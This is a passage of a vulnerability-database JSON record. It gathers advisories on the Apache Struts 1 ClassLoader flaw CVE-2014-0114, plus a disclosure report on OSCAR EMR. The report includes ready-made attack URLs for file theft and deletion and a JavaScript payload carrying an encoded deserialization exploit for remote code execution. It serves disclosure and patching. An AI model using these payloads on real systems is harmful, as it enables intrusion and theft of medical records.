"id": "95E9031F-A021-5296-ADC3-71E43A95A049", "href": "", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "privateArea": 1}], "freebsd": [{"lastseen": "2023-05-27T14:56:04", "description": "\n\nPayara Releases reports:\n\nThe following is a list of tracked Common Vulnerabilities and Exposures that have been reported and analyzed, which can or have impacted Payara Server across releases:\n\nCVE-2019-12086 A Polymorphic Typing issue was discovered in FasterXML jackson-databind 2.x before 2.9.9\n\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2019-05-17T00:00:00", "type": "freebsd", "title": "Payara -- A Polymorphic Typing issue in FasterXML jackson-databind", "bulletinFamily": "unix", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-12086"], "modified": "2019-05-17T00:00:00", "id": "BD159669-0808-11EB-A3A4-0019DBB15B3F", "href": "https://vuxml.freebsd.org/freebsd/bd159669-0808-11eb-a3a4-0019dbb15b3f.html", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "checkpoint_advisories": [{"lastseen": "2022-11-28T06:40:31", "description": "A security bypass vulnerability exists in Apache Struts. The vulnerability is due to inadequate validation of data processed by the ActionForm class allowing for manipulation of the ClassLoader. A remote unauthenticated attacker could exploit this vulnerability by providing a \"class\" parameter in an HTTP request.", "cvss3": {}, "published": "2014-05-18T00:00:00", "type": "checkpoint_advisories", "title": "Apache Struts ActionForm ClassLoader Security Bypass (CVE-2014-0114)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2014-05-25T00:00:00", "id": "CPAI-2014-1535", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "suse": [{"lastseen": "2016-09-04T12:30:16", "description": "Apache Struts was updated to fix a security issue:\n\n * CVE-2014-0114: The ActionForm object in Apache Struts 1.x through\n 1.3.10 allows remote attackers to "manipulate" the ClassLoader and\n execute arbitrary code via the class parameter, which is passed to\n the getClass method.\n", "cvss3": {}, "published": "2014-07-16T01:10:20", "type": "suse", "title": "Security update for struts (important)", "bulletinFamily": "unix", "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2014-07-16T01:10:20", "id": "SUSE-SU-2014:0902-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2014-07/msg00008.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "packetstorm": [{"lastseen": "2018-08-24T02:03:31", "description": "", "cvss3": {}, "published": "2018-08-23T00:00:00", "type": "packetstorm", "title": "OSCAR EMR 15.21beta361 XSS / Disclosure / CSRF / Insecure Direct Object Reference", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2018-08-23T00:00:00", "id": "PACKETSTORM:149050", "href": "https://packetstormsecurity.com/files/149050/OSCAR-EMR-15.21beta361-XSS-Disclosure-CSRF-Insecure-Direct-Object-Reference.html", "sourceData": "`Title: Multiple vulnerabilities in OSCAR EMR \nProduct: OSCAR EMR \nVendor: Oscar McMaster \nTested version: 15.21beta361 \nRemediation status: Unknown \nReported by: Brian D. Hysell \n \n----- \n \nProduct Description: \n \n\"OSCAR is open-source Electronic Medical Record (EMR) software that \nwas first developed at McMaster University by Dr. David Chan. It is \ncontinuously enriched by contributions from OSCAR users and the \nCharter OSCAR Service Providers that support them. OSCAR has been \ncertified by OntarioMD, and verified as IHE compliant, achievements \nmade possible by the creation and success of OSCAR EMRas ISO \n13485:2003 certified Quality Management System.\" \n \n----- \n \nTimeline: \n \n29 Mar 2016 - Vendor contacted \n29 Mar 2016 - Vendor responded \n29 Apr 2016 - Vendor contacted for permission to share redacted report \nwith third party \n02 May 2016 - Vendor responded \n17 Jan 2017 - Lead developer contacted (no response) \n01 Jul 2018 - Vendor and lead developer contacted for follow-up, \ninformed of intended 15 Aug disclosure (no response) \n12 Aug 2018 - Alternate email address attempted for lead developer (no response) \n15 Aug 2018 - Vulnerabilities publicly disclosed \n \n----- \n \nContents: \n \nThis report uses OVE identifiers: http://www.openwall.com/ove/ \n \nOVE-20160329-0001: Database backup disclosure or denial of service via \ninsecure dependency \nOVE-20160329-0003: Remote code execution via unsafe object deserialization \nOVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability in \nsecurity report interface \nOVE-20160329-0007: SQL injection \nOVE-20160329-0008: Path traversal \nOVE-20160329-0002: Insecure direct object reference in document manager \nOVE-20160329-0005: Denial of service via resource exhaustion \nOVE-20160329-0006: Insecure password storage \nOVE-20160329-0009: Cross-site request forgery \n \n----- \n \nIssue details: \n \n=== OVE-20160329-0001: Database backup disclosure or denial of service \nvia insecure dependency === \n \nOSCAR uses a version of Apache Struts, 1.2.7, which is vulnerable to \nCVE-2014-0114. \n \nAn authenticated user can issue the following request with different / \nomitted cookie headers: \n/oscar/login.do?class.classLoader.resources.dirContext.docBase=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster \n \nConsequently, he or she can access (using a valid session cookie), \ne.g., /oscar/OscarBackup.sql.gz \n \nAn unauthenticated attacker is prevented from doing likewise by the \naLoginFiltera servlet filter, but can still carry out a \ndenial-of-service attack impeding any access to the application until \nTomcat is restarted by issuing a request like the following: \n/oscar/login.do?class.classLoader.resources.dirContext.docBase=invalid \n \n=== OVE-20160329-0003: Remote code execution via unsafe object \ndeserialization === \n \nTraceabilityReportProcessor deserializes user-provided data, allowing \nremote code execution given the presence of known-vulnerable libraries \nin the classpath such as ROME 1.0. This functionality is only \navailable to administrators but can be exploited via XSS \n(OVE-20160329-0004) or CSRF (issue 9) using a payload generated with \nysoserial. \n \nIn the tested configuration PMmodule/GenericIntake/ImportForm.jsp is \ninaccessible due to the following exception \naorg.springframework.beans.factory.NoSuchBeanDefinitionException: No \nbean named 'oscarSecurityManager' is defineda, but were it to be \naccessible, it would be vulnerable as well. \n \n=== OVE-20160329-0004: Stored cross-site scripting (XSS) vulnerability \nin security report interface === \n \nlogReport.jsp, in general, does not escape data it outputs to the \npage; in particular, on line 283, prop.getProperty(\"contentId\") is \nprinted unescaped. As a result, if an attacker includes Javascript in \nhis or her username during a login attempt, it will be executed if an \nadministrator views the Security Log Report for that timeframe. The \ntext printed in the \"Keyword\" column is cut off at 80 characters, but \nthat is more than enough to load an externally-hosted script, such as \nthe following script exploiting the deserialization RCE \nOVE-20160329-0003: \n \nvar decodedBase64 = \natob(\"H4sIAJ8881YAA61WzW8bRRR/YyfexHWaJs1Xm6ZNSUvdtN3NR5M0uKJt0qZ1cEhFQnvwwYzXU2fDene7O5tsOHBA4sIBCcGFfwAOtIdKCBCVkCrEBU5InEBFXOBGOVRFXPh4M+vEbhJiU7rSvtl9895v3rz35s279Ss0ei60LdMVqvrcMNUr1Fuao06j8v29L7te+TYKkRmImzYtzFCd224amvmSy7wl2ywEzrnzIJ/VJiQR8SJYUrdLqudbqrdmFQydcsO21BuMFVSj5JjqfH6Z6XyKUeuN95UfVxrem41ANAO7c7ppW4zmTSbmOJzKII6GOFoVjiZwNIGjTVeLpzKwK8du+tT0Qu3BGtqXNmRRtSXH7QXuGlYxVD5ZQ3mxSjoVOLjnEzvv+TFb79O7X43Ov7oagUgG2nJG0bJddtW1HeZyg3kcWjMiHJoIh7bAOBrYkLPzyxzawwmTWkUtdGO4+sFK+KZt00Q+Lu8duVRy+BoCdD5y+z6OfpPEAKH4TXgdwySoIkgC9Z9bt952iyp1qL7E1IDiMqphceZa1FQDz+S6yl0aqIsMt0Q589I4Nl+fv2fd+mg0CrE0+tGwCsziL/qlPMNU2Z1DBcszGU8jP8hCPJdf40y3C2Kb0Wx2KgsxjDv18Lc9W7W7acHDjTfmLFpij+889H1K+M72uePzat91Vfmuwkc3iTT9Gx/flQu/8Oe+zmLxhwnpE5G4yI9kp2497P4j1rT4U5kde/Prvz7/AqeH4UwcovCMAuMKHFXgWQJ7POYa1LzGXA+9/XL6IgEyS6BlGl3PMYuuUdNnjbf73334zv3fnicQO2tYBsePaPL4NQIN0+gFgrE2LBb6a1EkCMGt2jrCUgTH/zKzgS8ZHoG9C9zPL5Z9epWuiXNJIJG2LOZKlzEUGsuseXZonOaEMl7okMu0UGTcO7INSorgwRasG7ZbIuAmN44A5oQW5oQmc0JbzwlN5oR2cX4uld1WumRWZEN7jNeYiykdfspDcoVaBZO5KeGSpoKt+yXMH1J1+OtZHlWXQhzc/tT/N4ZA/FKgM0ceIwWOEfjgv/mjpgUFXtIuLs5dCAwvjSyKlbW2Ul0+NMpwIg+exAoCStmXBC48DU8u2L6rsxlDpHGinIGqOKQJiMMuBZIERp8gYQmcrzcirm9xo8S0C3kPU1zn60gEOmSxMOyK8fK0TdaLvI60kS0EDtXYC4borG6WS0Fbpaq9FBqpwCD6DAXL/wQ6k8czW8RSCTgJp+JwAlQERBOY0z8y1ARDWCpYwHQCx5JbS2Y1EBZHnWGNTcAIjAqg0wQOVmy/uoolZWxybHxyaPz00PjI8JmJEQL9mZ0lUnAY24AooBX47odGiOGoyOagSfIw5EgTyNFwJDg2Dn4K5I4UaUEak0wVdiNNhALQChM4YvmDDpQSyufwjQreZsVRqdgfTpYVxVcndMl5At3Qgxr78Du0UcD2lmHTkrsN7ISEHQwnt4U9AH2yA0IvwiFcvrJAExzf2HQvzgip1g8hSjKfgdY+/AmMXb8j4SJot6CHoQ3HOKpEYAD2QLMvLupuxP5u4zrqFddRpwLdCvQosK/e6+jmL8aDs6XLPU/nOorO2PaW6+dozesHteopDPsJDNQBhVvf3BX968GudTh3TF9Sf/qmNqVvu5zfK2lHVXS7RHQdDg14mFxnlUBQu3+udK6P3uq5+/PvPW2ykcTWClnTYS/Vtk0rJXtIkUjNgbPiQp+QCFSs5urGvV9p7aDyBI5Q6kDDBnc2rLorbn709mzrwIPhzaYJqAOP2yKGQ+ESgvauyAZVkBbJ6BdkQP4LEquQ4B9DtscYvgwAAA==\"); \nvar binaryArray = new Uint8Array(new ArrayBuffer(decodedBase64.length)); \nfor(var i = 0; i < binaryArray.length; i++) { \nbinaryArray[i] = decodedBase64.charCodeAt(i); \n} \nvar payload = new Blob([binaryArray], {type: \"application/x-gzip\"}); \nvar formData = new FormData(); \nformData.append(\"file\", payload); \nformData.append(\"submit\", \"Generate\"); \nvar xhr = new XMLHttpRequest(); \nxhr.open(\"POST\", \"/oscar/admin/GenerateTraceabilityReportAction.do\"); \nxhr.send(formData); \n \nXSS was not a focus of this test; other confirmed or likely XSS \nvulnerabilities are: \n* Reflected XSS through the errormsg parameter in loginfailed.jsp \n* Reflected XSS through the signatureRequestId parameter in tabletSignature.jsp \n* Reflected XSS through the noteId parameter, line 1562 in \nCaseManagementViewAction (untested) \n* Reflected XSS through the pdfName parameter when an exception has \nbeen thrown, line 1174 in ManageDocumentAction (untested) \n* Reflected XSS through the pharmaName and pharmaFax parameters, line \n149 in FrmCustomedPDFServlet (untested) \n* Reflected XSS through the id and followupValue parameters, line 81 \nin EctAddShortMeasurementAction (untested) \n \n=== OVE-20160329-0007: SQL injection === \n \nOn line 239 of oscarMDS/PatientSearch.jsp, the orderby parameter is \nconcatenated into an SQL statement rather than parameterized; likewise \nthe content parameter on lines 217, 223, and 229 of \nadmin/logReport.jsp. In both cases these errors result in error-based \nSQL injection vulnerabilities; the former allows authenticated users \nwith access to oscarMDS/PatientSearch.jsp to access information beyond \ntheir privilege levels while the latter is accessible only to \nadministrators. \n \n=== OVE-20160329-0008: Path traversal === \n \nImportLogDownloadAction reads and outputs an arbitrary absolute file \npath provided by the user; DelImageAction deletes a user-specified \nfilename without accounting for the possibility of relative path \ntraversal (i.e., the inclusion of \"../\" in the filename). \n \nAny authenticated user can exploit the former issue to steal files \nfrom the system, e.g., \n/oscar/form/importLogDownload.do?importlog=/var/lib/tomcat7/webapps/OscarDocument/oscar_mcmaster/OscarBackup.sql.gz \n \nAn authenticated user with access to eforms can delete files writeable \nby the Tomcat user, e.g., \n/oscar/eform/deleteImage.do?filename=../../../../oscar/index.jsp \n \n=== OVE-20160329-0002: Insecure direct object reference in document manager === \n \nManageDocumentAction.display() does not check the permissions \nassociated with the requested document ID (doc_no) before providing it \nto the requesting user. Given \n/oscar/dms/ManageDocument.do?method=display&doc_no=X&providerNo=Y, a \nuser with access to the document management interface can view \narbitrary documents by incrementing or decrementing X, regardless of \nwhether they have been marked private. \n \n=== OVE-20160329-0005: Denial of service via resource exhaustion === \n \nuploadSignature.jsp, which is accessible to and operable by \nunauthenticated users, saves uploaded files to a temporary directory \nbut never deletes them. An attacker can upload many junk files and \neventually consume all disk space available to the /tmp directory, \nimpeding access to the application depending on the functionality in \nquestion and the partition layout of the host system (the effects are \ncrippling and pervasive if /tmp is on the same partition as /; they \nare much less so if /tmp is on a separate partition). \n \n=== OVE-20160329-0006: Insecure password storage === \n \nPasswords are stored as SHA-1 hashes; unless unusually complex, \npasswords stored in that manner are typically easily recoverable with \na tool such as oclHashcat. In OSCAR each hash is stored as a string of \ndecimal numbers, rather than hexadecimal or raw bytes. This somewhat \nnon-traditional representation adds a bit of programming work to the \ncracking process, but does not represent a major impediment to attack. \n \n=== OVE-20160329-0009: Cross-site request forgery === \n \nThe application lacks protection against cross-site request forgery \nattacks. A CSRF attack could be used against an administrator to \nexploit the deserialization RCE in a manner similar to the example \nprovided with OVE-20160329-0004. \n \n \n`\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/149050/oscaremr-execxss.txt"}], "securityvulns": [{"lastseen": "2018-08-31T11:10:52", "description": "\r\nHi All\r\n\r\nI have raised this twice with security@apache.org, on 30 April and June 3. I have received no response either time, therefore I am raising it on oss-security.\r\n\r\nCVE-2014-0114 describes a well-known issue in Apache Struts 1:\r\n\r\n"It was found that the Struts 1 ActionForm object allowed access to the 'class' parameter, which is directly mapped to the getClass() method. A remote attacker could use this flaw to manipulate the ClassLoader used by an application server running Struts 1. This could lead to remote code execution under certain conditions."\r\n\r\nThe root cause of this flaw is that commons-beanutils exposes the class property by default, with no mechanism to disable access to it. Struts 1 is considered EOL upstream, and upstream has not yet shipped a patch for this flaw. Red Hat has shipped a patch, which was submitted upstream as a pull request:\r\n\r\nhttps://github.com/apache/struts1/pull/1\r\n\r\nThis patch disables access to the class property in struts itself, rather than in commons-beanutils. Other frameworks built on commons-beanutils, such as Apache Stripes, are likely to expose similar issues. I think it would be a good idea to also assign a separate CVE ID to commons-beanutils, and ship a patch for commons-beanutils itself. The commons-beanutils patch could be inherited by other frameworks that may not have the resources to produce their own patch.\r\n\r\ncommons-beanutils 1.9.2 has now shipped:\r\n\r\nhttp://commons.apache.org/proper/commons-beanutils/javadocs/v1.9.2/RELEASE-NOTES.txt\r\n\r\nIncorporating a patch for this issue:\r\n\r\nhttps://issues.apache.org/jira/browse/BEANUTILS-463\r\n\r\n"A specialized BeanIntrospector implementation has been added which allows suppressing properties. There is also a pre-configured instance removing the class property from beans. Some notes have been added to the user's guide."\r\n\r\nI think it would be appropriate to assign a CVE ID to this issue in commons-beanutils, and publish an advisory. This would provide framework developers with the necessary information and impetus to upgrade to commons-beanutils 1.9.2 and make use of SuppressPropertiesBeanIntrospector.\r\n\r\nThanks\r\n-- \r\nDavid Jorm / Red Hat Product Security\r\n", "cvss3": {}, "published": "2014-06-17T00:00:00", "type": "securityvulns", "title": "[oss-security] CVE request for commons-beanutils: 'class' property is exposed, potentially leading to RCE", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2014-06-17T00:00:00", "id": "SECURITYVULNS:DOC:30881", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:30881", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:56", "description": "ActionForm class parameter unrestricted access.", "cvss3": {}, "published": "2014-06-17T00:00:00", "type": "securityvulns", "title": "Apache commons-beanutils code exeuction", "bulletinFamily": "software", "hackapp": {}, "cvss2": {}, "cvelist": ["CVE-2014-0114"], "modified": "2014-06-17T00:00:00", "id": "SECURITYVULNS:VULN:13845", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13845", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "centos": [{"lastseen": "2023-05-27T10:31:54", "description": "**CentOS Errata and Security Advisory** CESA-2014:0474\n\n\nApache Struts is a framework for building web applications with Java.\n\nIt was found that the Struts 1 ActionForm object allowed access to the\n'class' parameter, which is directly mapped to the getClass() method. A\nremote attacker could use this flaw to manipulate the ClassLoader used by\nan application server running Struts 1. This could lead to remote code\nexecution under certain conditions. (CVE-2014-0114)\n\nAll struts users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. All running applications\nusing struts must be restarted for this update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttps://lists.centos.org/pipermail/centos-announce/2014-May/069759.html\n\n**Affected packages:**\nstruts\nstruts-javadoc\nstruts-manual\nstruts-webapps-tomcat5\n\n**Upstream details at:**\nhttps://access.redhat.com/errata/RHSA-2014:0474", "cvss3": {}, "published": "2014-05-07T14:04:43", "type": "centos", "title": "struts security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2014-05-07T14:04:43", "id": "CESA-2014:0474", "href": "https://lists.centos.org/pipermail/centos-announce/2014-May/069759.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "mageia": [{"lastseen": "2023-05-27T10:29:33", "description": "Updated struts packages fix security vulnerability: It was found that the Struts 1 ActionForm object allowed access to the 'class' parameter, which is directly mapped to the getClass() method. A remote attacker could use this flaw to manipulate the ClassLoader used by an application server running Struts 1. This could lead to remote code execution under certain conditions (CVE-2014-0114). \n", "cvss3": {}, "published": "2014-05-14T22:13:20", "type": "mageia", "title": "Updated struts packages fix CVE-2014-0114\n", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2014-05-14T22:13:20", "id": "MGASA-2014-0219", "href": "https://advisories.mageia.org/MGASA-2014-0219.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "gentoo": [{"lastseen": "2023-05-27T10:58:27", "description": "### Background\n\nCommons-beanutils provides easy-to-use wrappers around Reflection and Introspection APIs \n\n### Description\n\nApache Commons BeanUtils does not suppress the class property, which allows for the manipulation of the ClassLoader. \n\n### Impact\n\nRemote attackers could potentially execute arbitrary code with the privileges of the process. \n\n### Workaround\n\nThere is no known workaround at this time.\n\n### Resolution\n\nAll Commons BeanUtils users should upgrade to the latest version:\n \n \n # emerge --sync\n # emerge --ask --oneshot --verbose\n \">=dev-java/commons-beanutils-1.9.2\"", "cvss3": {}, "published": "2016-07-20T00:00:00", "type": "gentoo", "title": "Commons-BeanUtils: Arbitrary code execution", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2016-07-20T00:00:00", "id": "GLSA-201607-09", "href": "https://security.gentoo.org/glsa/201607-09", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "f5": [{"lastseen": "2021-06-08T18:45:07", "description": "*F5 Product Development has determined that these specific product versions, while they use a version of Apache Struts that has not been patched specifically for CVE-2014-0114, the Configuration utility inputs are appropriately sanitized to ensure these versions are not vulnerable to the issue indicated by CVE-2014-0114. Beginning in BIG-IP 11.6.0, the version of Apache Struts has been specifically patched for CVE-2014-0114.\n\nRecommended Action\n\nIf the previous table lists a version in the **Versions known to be not vulnerable** column, you can eliminate this vulnerability by upgrading to the listed version. If the table does not list any version in the column, then no upgrade candidate currently exists.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "cvss3": {}, "published": "2014-05-19T00:00:00", "type": "f5", "title": "SOL15282 - Apache Struts vulnerability CVE-2014-0114", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2014-10-20T00:00:00", "id": "SOL15282", "href": "http://support.f5.com/kb/en-us/solutions/public/15000/200/sol15282.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2023-05-26T10:21:36", "description": "Fuse ESB Enterprise is an integration platform based on Apache ServiceMix.\n\nIt was found that the Struts 1 ActionForm object allowed access to the\n'class' parameter, which is directly mapped to the getClass() method.\nA remote attacker could use this flaw to manipulate the ClassLoader used by\nan application server running Struts 1. This could lead to remote code\nexecution under certain conditions. (CVE-2014-0114)\n\nRefer to the readme.txt file included with the patch files for\ninstallation instructions.\n\nAll users of Fuse ESB Enterprise 7.1.0 as provided from the Red Hat\nCustomer Portal are advised to apply this security update.\n", "cvss3": {}, "published": "2014-05-14T00:00:00", "type": "redhat", "title": "(RHSA-2014:0498) Important: Fuse ESB Enterprise 7.1.0 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2019-03-22T19:43:50", "id": "RHSA-2014:0498", "href": "https://access.redhat.com/errata/RHSA-2014:0498", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-26T10:21:36", "description": "Apache Struts is a framework for building web applications with Java.\n\nIt was found that the Struts 1 ActionForm object allowed access to the\n'class' parameter, which is directly mapped to the getClass() method. A\nremote attacker could use this flaw to manipulate the ClassLoader used by\nan application server running Struts 1. This could lead to remote code\nexecution under certain conditions. (CVE-2014-0114)\n\nAll struts users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. All running applications\nusing struts must be restarted for this update to take effect.\n", "cvss3": {}, "published": "2014-05-07T00:00:00", "type": "redhat", "title": "(RHSA-2014:0474) Important: struts security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2017-09-08T07:48:35", "id": "RHSA-2014:0474", "href": "https://access.redhat.com/errata/RHSA-2014:0474", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-26T10:21:36", "description": "Red Hat JBoss Fuse, based on Apache ServiceMix, provides a small-footprint,\nflexible, open source enterprise service bus and integration platform.\n\nIt was found that the Struts 1 ActionForm object allowed access to the\n'class' parameter, which is directly mapped to the getClass() method.\nA remote attacker could use this flaw to manipulate the ClassLoader used by\nan application server running Struts 1. This could lead to remote code\nexecution under certain conditions. (CVE-2014-0114)\n\nRefer to the readme.txt file included with the patch files for\ninstallation instructions.\n\nAll users of Red Hat JBoss Fuse 6.1.0 as provided from the Red Hat Customer\nPortal are advised to apply this security update.", "cvss3": {}, "published": "2014-05-14T18:02:20", "type": "redhat", "title": "(RHSA-2014:0497) Important: Red Hat JBoss Fuse 6.1.0 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": "2019-02-20T12:14:45", "id": "RHSA-2014:0497", "href": "https://access.redhat.com/errata/RHSA-2014:0497", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-26T10:21:36", "description": "Red Hat Satellite is a systems management tool for Linux-based\ninfrastructures. It allows for provisioning, monitoring, and remote\nmanagement of multiple Linux deployments with a single, centralized tool.\n\nApache Struts is a framework for building web applications with Java.\n\nIt was found that the Struts 1 ActionForm object allowed access to the\n'class' parameter, which is directly mapped to the getClass() method. A\nremote attacker could use this flaw to manipulate the ClassLoader used by\nan application server running Struts 1. This could lead to remote code\nexecution under certain conditions. (CVE-2014-0114)\n\nAll Satellite users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue. For this update to take\neffect, the tomcat6 service must be restarted (\"service tomcat6 restart\").\n", "cvss3": {}, "published": "2014-05-14T00:00:00", "type": "redhat", "title": "(RHSA-2014:0500) Important: struts security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2014-0114"], "modified": 